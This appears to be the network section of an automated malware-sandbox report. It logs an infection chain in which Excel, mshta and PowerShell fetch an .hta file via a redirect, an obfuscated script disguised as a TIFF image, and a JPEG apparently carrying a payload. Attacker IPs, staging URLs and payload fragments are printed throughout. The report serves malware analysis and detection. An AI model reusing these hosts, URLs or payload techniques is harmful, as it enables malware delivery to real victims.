                                                                        Dec 12, 2024 21:38:19.684197903 CET1236INData Raw: 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25
                                                                        Data Ascii: %30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.224916523.95.235.29804004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:38:26.025970936 CET384OUTGET /90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF HTTP/1.1
                                                                        Accept: */*
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        Host: 23.95.235.29
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:38:27.133001089 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:26 GMT
                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                        Last-Modified: Thu, 12 Dec 2024 09:33:52 GMT
                                                                        ETag: "258ae-6290f698ce816"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 153774
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Content-Type: image/tiff
                                                                        Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 63 00 55 00 55 00 4f 00 57 00 55 00 76 00 7a 00 76 00 66 00 6e 00 70 00 68 00 42 00 6d 00 20 00 3d 00 20 00 22 00 57 00 78 00 51 00 65 00 4b 00 4c 00 4c 00 76 00 62 00 57 00 4e 00 62 00 76 00 51 00 6b 00 22 00 0d 00 0a 00 63 00 63 00 65 00 55 00 4a 00 6f 00 47 00 62 00 6b 00 4b 00 47 00 68 00 4c 00 6d 00 64 00 20 00 3d 00 20 00 22 00 47 00 57 00 4c 00 7a 00 4c 00 70 00 65 00 4c 00 57 00 74 00 4f 00 55 00 69 00 47 00 4b 00 22 00 0d 00 0a 00 72 00 4b 00 57 00 69 00 4b 00 50 00 4b 00 57 00 71 00 57 00 57 00 65 00 4e 00 63 00 57 00 20 00 3d 00 20 00 22 00 42 00 4b 00 63 00 4c 00 61 00 4b 00 72 00 57 00 5a 00 69 00 4b 00 68 00 57 00 41 00 70 00 22 00 0d 00 0a 00 0d 00 0a 00 61 00 6f 00 6b 00 6c 00 4c 00 71 00 64 00 4c 00 61 00 70 00 69 00 73 00 57 00 63 00 47 00 20 00 3d 00 20 00 22 00 70 00 6e 00 57 00 4c 00 6e 00 41 00 73 00 51 00 65 00 6e 00 5a 00 4a 00 6a 00 42 00 70 00 22 00 0d 00 0a 00 76 00 55 00 53 00 69 00 57 00 63 00 69 00 4b 00 53 00 6d 00 [TRUNCATED]
                                                                        Data Ascii: cUUOWUvzvfnphBm = "WxQeKLLvbWNbvQk"cceUJoGbkKGhLmd = "GWLzLpeLWtOUiGK"rKWiKPKWqWWeNcW = "BKcLaKrWZiKhWAp"aoklLqdLapisWcG = "pnWLnAsQenZJjBp"vUSiWciKSmLBGqj = "fpbKKPmnekkLWuk"iUcAWuILKSKULuj = "rLbWiUGRonrmTUq"HcJKWkhiiKcJGGA = "GksZWveOcbLxWiR"zemLKbLAKAhWeof = "CpiWzGWdcsKNolK"xLpxiKLooLmutmh = "JthGcTLexmLWcWi"cqBaLhZUICNhKbl = "erfWKLegLBPbfUW"WqfKzhKbNeaKgLW = "xWLfWGiCGCqkcec"qKIkbptpbCWUKGu = "uhmPactnWSWHGGW"RzmRvL
                                                                        Dec 12, 2024 21:38:27.133377075 CET1236INData Raw: 00 4c 00 4f 00 4b 00 47 00 4a 00 61 00 78 00 57 00 57 00 20 00 3d 00 20 00 22 00 75 00 63 00 61 00 7a 00 42 00 65 00 6c 00 6f 00 5a 00 6f 00 68 00 64 00 4b 00 63 00 7a 00 22 00 0d 00 0a 00 4c 00 6e 00 47 00 4e 00 55 00 5a 00 54 00 6d 00 4c 00 47
                                                                        Data Ascii: LOKGJaxWW = "ucazBeloZohdKcz"LnGNUZTmLGciuvn = "cTRLzGcNNpdrfio"BtguLLxLcapQZuo = "WkinlUGLLxggOUo"RpthLviWpWQLWB
                                                                        Dec 12, 2024 21:38:27.133388996 CET1236INData Raw: 00 69 00 7a 00 76 00 47 00 57 00 70 00 22 00 0d 00 0a 00 4c 00 57 00 70 00 66 00 4c 00 70 00 72 00 69 00 57 00 48 00 6e 00 47 00 6b 00 4c 00 6b 00 20 00 3d 00 20 00 22 00 65 00 6d 00 4c 00 63 00 52 00 7a 00 7a 00 65 00 4c 00 69 00 47 00 4e 00 4e
                                                                        Data Ascii: izvGWp"LWpfLpriWHnGkLk = "emLcRzzeLiGNNcm"KQmcNGqIAAxkWie = "bkLLqkkWekKTbic"lhdLqccGpehmWLL = "hBtvBiqincoULAP"W
                                                                        Dec 12, 2024 21:38:27.135523081 CET1236INData Raw: 00 51 00 49 00 20 00 3d 00 20 00 22 00 55 00 4c 00 7a 00 72 00 63 00 69 00 4b 00 78 00 4b 00 63 00 6c 00 55 00 4c 00 68 00 6f 00 22 00 0d 00 0a 00 6d 00 54 00 54 00 68 00 69 00 4c 00 54 00 62 00 55 00 6f 00 69 00 4c 00 63 00 42 00 6f 00 20 00 3d
                                                                        Data Ascii: QI = "ULzrciKxKclULho"mTThiLTbUoiLcBo = "RKGiPhbiUgcxGia"xLWKAfKNkLumWik = "ozoCueuaAOpvAPc"gQZcpBtWUxWxRti = "NWsL
                                                                        Dec 12, 2024 21:38:27.135534048 CET1236INData Raw: 00 78 00 69 00 6d 00 4b 00 66 00 69 00 6d 00 63 00 69 00 4f 00 4c 00 6c 00 47 00 72 00 65 00 20 00 3d 00 20 00 22 00 4a 00 61 00 67 00 50 00 69 00 6b 00 6f 00 43 00 6b 00 4f 00 74 00 50 00 68 00 62 00 61 00 22 00 0d 00 0a 00 69 00 41 00 57 00 65
                                                                        Data Ascii: ximKfimciOLlGre = "JagPikoCkOtPhba"iAWeexoiidbHzUL = "iLlaPupKtWKKArL"faRZojLlSWhexKW = "hhcWlcvlkakKcmO"NJlQLpUj
                                                                        Dec 12, 2024 21:38:27.138134003 CET1236INData Raw: 00 4f 00 78 00 53 00 4e 00 41 00 6e 00 6f 00 57 00 5a 00 47 00 69 00 4c 00 22 00 0d 00 0a 00 65 00 62 00 54 00 41 00 63 00 55 00 6c 00 4c 00 7a 00 6e 00 55 00 57 00 47 00 6f 00 4b 00 20 00 3d 00 20 00 22 00 41 00 6b 00 65 00 63 00 66 00 4e 00 4c
                                                                        Data Ascii: OxSNAnoWZGiL"ebTAcUlLznUWGoK = "AkecfNLeoZezGrf"AbhWLLzHSmmBsbx = "GkiKKLLGWAlrLiv"eBAzoGalixlPbAi = "ibRKhGhUUlkeG
                                                                        Dec 12, 2024 21:38:27.138147116 CET1236INData Raw: 00 71 00 6e 00 4b 00 52 00 4b 00 57 00 4c 00 6b 00 20 00 3d 00 20 00 22 00 69 00 6f 00 63 00 54 00 6f 00 75 00 4a 00 6c 00 68 00 4c 00 4c 00 4e 00 42 00 4e 00 4c 00 22 00 0d 00 0a 00 48 00 62 00 47 00 4b 00 41 00 41 00 43 00 4c 00 4b 00 62 00 68
                                                                        Data Ascii: qnKRKWLk = "iocTouJlhLLNBNL"HbGKAACLKbhOrii = "xppTLaRLuLUkxnZ"mAQpjTWhOehGnos = "OfKsZGiLuKKlWOe"RaacNTTJKnWpcUf =
                                                                        Dec 12, 2024 21:38:27.140757084 CET1236INData Raw: 00 6e 00 7a 00 63 00 22 00 0d 00 0a 00 41 00 55 00 6f 00 70 00 6a 00 4f 00 57 00 6d 00 52 00 4c 00 63 00 4a 00 4e 00 6b 00 69 00 20 00 3d 00 20 00 22 00 4e 00 66 00 57 00 6b 00 43 00 4c 00 41 00 42 00 65 00 41 00 6f 00 4c 00 63 00 6c 00 69 00 22
                                                                        Data Ascii: nzc"AUopjOWmRLcJNki = "NfWkCLABeAoLcli"bzmgRpAbZzNLkWG = "KWiOaUWmjKCLqgf"PKAmaWLLrGCeUtG = "eAPGzuUkbRvABLu"mO
                                                                        Dec 12, 2024 21:38:27.140784025 CET1236INData Raw: 00 3d 00 20 00 22 00 57 00 76 00 62 00 42 00 66 00 74 00 57 00 57 00 51 00 6e 00 47 00 71 00 6f 00 4f 00 50 00 22 00 0d 00 0a 00 52 00 66 00 43 00 78 00 69 00 70 00 6d 00 42 00 72 00 4c 00 63 00 6f 00 55 00 6e 00 63 00 20 00 3d 00 20 00 22 00 47
                                                                        Data Ascii: = "WvbBftWWQnGqoOP"RfCxipmBrLcoUnc = "GdehepPaULNRWSK"LLcLhzoKNKBLmUL = "UffWWAtROBiCGiK"lfUhihfeqoGeoff = "TkLiJaj
                                                                        Dec 12, 2024 21:38:27.143368959 CET1236INData Raw: 00 54 00 4f 00 4e 00 69 00 5a 00 4b 00 62 00 6d 00 6d 00 57 00 62 00 4c 00 71 00 5a 00 20 00 3d 00 20 00 22 00 4c 00 66 00 4c 00 48 00 75 00 4f 00 42 00 6a 00 63 00 6c 00 6b 00 69 00 47 00 75 00 6f 00 22 00 0d 00 0a 00 6c 00 5a 00 57 00 47 00 43
                                                                        Data Ascii: TONiZKbmmWbLqZ = "LfLHuOBjclkiGuo"lZWGCiWrifUBWrW = "sCcBLnuZfiGZbLT"tiOKpKBGKKUieKi = "ppCuCKSGLlKCabc"PPbUNjneppJ
                                                                        Dec 12, 2024 21:38:27.253382921 CET1236INData Raw: 00 75 00 57 00 6c 00 66 00 6f 00 68 00 4c 00 4e 00 63 00 22 00 0d 00 0a 00 63 00 74 00 64 00 57 00 6c 00 50 00 6b 00 50 00 57 00 41 00 61 00 7a 00 4f 00 6b 00 49 00 20 00 3d 00 20 00 22 00 70 00 48 00 70 00 42 00 50 00 74 00 4c 00 41 00 57 00 57
                                                                        Data Ascii: uWlfohLNc"ctdWlPkPWAazOkI = "pHpBPtLAWWmWdnm"fLZzUpLvutUqPdb = "biuqHOWrzBKfLtp"mkAHeKALkIKQWKS = "AovctLgHsuAmAl


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.224917123.95.235.29802692C:\Windows\System32\mshta.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:38:39.128458977 CET505OUTGET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: fr-FR
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        If-Modified-Since: Thu, 12 Dec 2024 07:14:16 GMT
                                                                        Connection: Keep-Alive
                                                                        Host: 23.95.235.29
                                                                        If-None-Match: "14266-6290d7647e9e9"
                                                                        Dec 12, 2024 21:38:40.302668095 CET275INHTTP/1.1 304 Not Modified
                                                                        Date: Thu, 12 Dec 2024 20:38:40 GMT
                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                        Last-Modified: Thu, 12 Dec 2024 07:14:16 GMT
                                                                        ETag: "14266-6290d7647e9e9"
                                                                        Accept-Ranges: bytes
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.2249161104.21.34.1834433588C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:12 UTC405OUTGET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1
                                                                        Accept: */*
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        Host: jktc.pro
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:13 UTC1231INHTTP/1.1 302 Found
                                                                        Date: Thu, 12 Dec 2024 20:38:13 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 116
                                                                        Connection: close
                                                                        cross-origin-embedder-policy: require-corp
                                                                        cross-origin-opener-policy: same-origin
                                                                        cross-origin-resource-policy: same-origin
                                                                        x-dns-prefetch-control: off
                                                                        x-frame-options: SAMEORIGIN
                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                        x-download-options: noopen
                                                                        x-content-type-options: nosniff
                                                                        origin-agent-cluster: ?1
                                                                        x-permitted-cross-domain-policies: none
                                                                        referrer-policy: no-referrer
                                                                        x-xss-protection: 0
                                                                        location: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                        vary: Accept, Accept-Encoding
                                                                        x-do-app-origin: 5a212e0f-46b3-415c-8929-fe4f6fb9f10b
                                                                        Cache-Control: private
                                                                        x-do-orig-status: 302
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VUkwG9j8wD01GByEEKKUhHt1Ov3gAXbzXpHW1SCrUqCiIjBFUR4C55RwTJ32%2BrAK5yDeZqaEHjdPhjbH8y82AW2l6qaELIN6z7NpVuycbQi%2FjJyArDTtw%2BPB5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f10844afcf87c8d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-12-12 20:38:13 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 30 34 34 26 6d 69 6e 5f 72 74 74 3d 32 30 34 33 26 72 74 74 5f 76 61 72 3d 37 36 39 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 34 26 72 65 63 76 5f 62 79 74 65 73 3d 39 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 32 31 36 31 36 26 63 77 6e 64 3d 31 37 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 31 61 30 33 33 36 33 36 35 37 37 32 33 33 38 37 26 74 73 3d 37 33 32 26 78 3d 30 22 0d 0a 0d 0a
                                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2044&min_rtt=2043&rtt_var=769&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2804&recv_bytes=987&delivery_rate=1421616&cwnd=178&unsent_bytes=0&cid=1a03363657723387&ts=732&x=0"
                                                                        2024-12-12 20:38:13 UTC116INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 39 30 2f 77 63 63 2f 67 72 65 61 74 61 74 74 69 74 75 64 65 77 69 74 68 6e 69 63 65 66 65 61 74 72 75 65 77 69 74 68 67 72 65 61 74 6e 69 63 65 63 72 65 61 6d 79 70 75 72 70 6c 65 74 68 69 6e 67 73 67 6f 6f 64 2e 68 74 61
                                                                        Data Ascii: Found. Redirecting to http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.2249163104.21.34.1834433880C:\Windows\System32\mshta.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:17 UTC429OUTGET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: fr-FR
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        Host: jktc.pro
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:18 UTC1233INHTTP/1.1 302 Found
                                                                        Date: Thu, 12 Dec 2024 20:38:18 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 116
                                                                        Connection: close
                                                                        cross-origin-embedder-policy: require-corp
                                                                        cross-origin-opener-policy: same-origin
                                                                        cross-origin-resource-policy: same-origin
                                                                        x-dns-prefetch-control: off
                                                                        x-frame-options: SAMEORIGIN
                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                        x-download-options: noopen
                                                                        x-content-type-options: nosniff
                                                                        origin-agent-cluster: ?1
                                                                        x-permitted-cross-domain-policies: none
                                                                        referrer-policy: no-referrer
                                                                        x-xss-protection: 0
                                                                        location: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                        vary: Accept, Accept-Encoding
                                                                        x-do-app-origin: 5a212e0f-46b3-415c-8929-fe4f6fb9f10b
                                                                        Cache-Control: private
                                                                        x-do-orig-status: 302
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mocp3o0tb9K20NzF3zn6E7a%2FRkbsKM9rZA19vvOZ82XIJe%2Bey943bgZS2tr9s3j%2BVi8JkzsXSrKWmgBlAZVZLAjlsfddmThQ6HcyOdYMBN55mP8%2Bz6Dr2Au0cQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f1084698856436f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-12-12 20:38:18 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 34 35 26 6d 69 6e 5f 72 74 74 3d 31 36 31 39 26 72 74 74 5f 76 61 72 3d 36 39 37 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 33 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 31 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 38 30 33 35 38 32 26 63 77 6e 64 3d 31 38 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 36 31 63 64 38 62 66 35 32 35 33 37 33 62 39 64 26 74 73 3d 37 36 31 26 78 3d 30 22 0d 0a 0d 0a
                                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1619&rtt_var=697&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2803&recv_bytes=1011&delivery_rate=1803582&cwnd=181&unsent_bytes=0&cid=61cd8bf525373b9d&ts=761&x=0"
                                                                        2024-12-12 20:38:18 UTC116INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 39 30 2f 77 63 63 2f 67 72 65 61 74 61 74 74 69 74 75 64 65 77 69 74 68 6e 69 63 65 66 65 61 74 72 75 65 77 69 74 68 67 72 65 61 74 6e 69 63 65 63 72 65 61 6d 79 70 75 72 70 6c 65 74 68 69 6e 67 73 67 6f 6f 64 2e 68 74 61
                                                                        Data Ascii: Found. Redirecting to http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.2249166104.21.34.1834433588C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:34 UTC405OUTGET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1
                                                                        Accept: */*
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        Host: jktc.pro
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:35 UTC1231INHTTP/1.1 302 Found
                                                                        Date: Thu, 12 Dec 2024 20:38:35 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 116
                                                                        Connection: close
                                                                        cross-origin-embedder-policy: require-corp
                                                                        cross-origin-opener-policy: same-origin
                                                                        cross-origin-resource-policy: same-origin
                                                                        x-dns-prefetch-control: off
                                                                        x-frame-options: SAMEORIGIN
                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                        x-download-options: noopen
                                                                        x-content-type-options: nosniff
                                                                        origin-agent-cluster: ?1
                                                                        x-permitted-cross-domain-policies: none
                                                                        referrer-policy: no-referrer
                                                                        x-xss-protection: 0
                                                                        location: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                        vary: Accept, Accept-Encoding
                                                                        x-do-app-origin: 5a212e0f-46b3-415c-8929-fe4f6fb9f10b
                                                                        Cache-Control: private
                                                                        x-do-orig-status: 302
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FLSzlXIv3bTULYj1UYewn2wPkWQa35As0zh8v7W7IXRiLUysmGxS09PXyUCATjs%2B0QRKf9Wk6XNa2qPPBKrNOMeb7e0nl%2FvLEbe1eHFBjSVwCkChU3LlamEnyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f1084d30b7a7d11-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-12-12 20:38:35 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 31 39 30 26 6d 69 6e 5f 72 74 74 3d 32 30 33 32 26 72 74 74 5f 76 61 72 3d 38 37 35 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 34 26 72 65 63 76 5f 62 79 74 65 73 3d 39 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 33 37 30 30 37 26 63 77 6e 64 3d 32 32 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 66 66 32 37 66 37 65 38 30 35 65 30 37 61 39 26 74 73 3d 37 33 35 26 78 3d 30 22 0d 0a 0d 0a
                                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2190&min_rtt=2032&rtt_var=875&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2804&recv_bytes=987&delivery_rate=1437007&cwnd=227&unsent_bytes=0&cid=4ff27f7e805e07a9&ts=735&x=0"
                                                                        2024-12-12 20:38:35 UTC116INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 39 30 2f 77 63 63 2f 67 72 65 61 74 61 74 74 69 74 75 64 65 77 69 74 68 6e 69 63 65 66 65 61 74 72 75 65 77 69 74 68 67 72 65 61 74 6e 69 63 65 63 72 65 61 6d 79 70 75 72 70 6c 65 74 68 69 6e 67 73 67 6f 6f 64 2e 68 74 61
                                                                        Data Ascii: Found. Redirecting to http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.2249167151.101.1.1374432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:34 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                        Host: res.cloudinary.com
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:35 UTC803INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 2230233
                                                                        Content-Type: image/jpeg
                                                                        Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                        Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                        Date: Thu, 12 Dec 2024 20:38:35 GMT
                                                                        Strict-Transport-Security: max-age=604800
                                                                        Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                        Server-Timing: cld-fastly;dur=175;cpu=1;start=2024-12-12T20:38:35.201Z;desc=miss,rtt;dur=179,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=159;start=2024-12-12T20:38:35.208Z
                                                                        Server: Cloudinary
                                                                        Timing-Allow-Origin: *
                                                                        Access-Control-Allow-Origin: *
                                                                        Accept-Ranges: bytes
                                                                        X-Content-Type-Options: nosniff
                                                                        Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                        x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
